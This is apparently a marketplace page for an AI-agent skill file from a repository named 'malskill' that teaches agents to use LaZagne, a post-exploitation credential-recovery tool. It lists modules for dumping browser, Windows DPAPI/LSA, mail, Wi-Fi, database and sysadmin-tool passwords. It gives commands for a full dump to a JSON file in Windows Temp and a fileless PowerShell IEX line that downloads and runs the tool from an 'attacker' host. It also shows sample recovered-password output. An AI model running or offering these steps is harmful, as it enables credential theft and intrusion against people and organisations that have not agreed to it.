offensive-tools/windows/lazagne/SKILL.md
Auth/lab ref: LaZagne secret-exposure audit; browser/app/Wi-Fi/Git artifacts, user/admin context, defensive validation evidence.
npx skillsauth add aeondave/malskill lazagneInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Post-exploitation credential recovery from installed applications — browsers, mail, Git, databases, WiFi, and more.
# Dump everything
lazagne.exe all
# Browsers only
lazagne.exe browsers
# Specific module
lazagne.exe windows
| Category | What's Covered |
|----------|----------------|
| browsers | Chrome, Firefox, Edge, Opera, IE, Brave |
| windows | Credential Manager, DPAPI, LSA secrets, Vault |
| mails | Thunderbird, Outlook, Outlook Express |
| databases | MySQL, PostgreSQL, MSSQL, Oracle |
| network | WiFi passwords, VPN (Cisco, OpenVPN, WireGuard) |
| memory | KeePass, mRemoteNG, Pidgin |
| git | Git credentials |
| chats | Skype |
| sysadmin | WinSCP, PuTTY, FileZilla, mRemoteNG, TeamViewer |
| Flag | Description |
|------|-------------|
| all | Run all modules |
| <module> | Run specific module category |
| -oJ <file> | JSON output |
| -oN <file> | Text output |
| -oA <dir> | All output formats to directory |
| -v | Verbose |
| -vv | Debug |
| -quiet | No banner |
# Full credential dump to JSON
lazagne.exe all -oJ C:\Windows\Temp\creds.json -quiet
# Browser creds only
lazagne.exe browsers -v
# Sysadmin tool creds (WinSCP, FileZilla, etc.)
lazagne.exe sysadmin
# WiFi passwords
lazagne.exe network
# Run from PowerShell (in-memory if needed)
# Download and run without dropping to disk:
IEX(New-Object Net.WebClient).DownloadString('http://attacker/LaZagne.py')
[+] Password found !!!
URL: https://corp-mail.example.com
Login: [email protected]
Password: Summer2024!
| File | When to load |
|------|--------------|
| references/credential-sources.md | Module details, DPAPI decryption, browser DB paths, output parsing |
development
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
development
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
devops
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.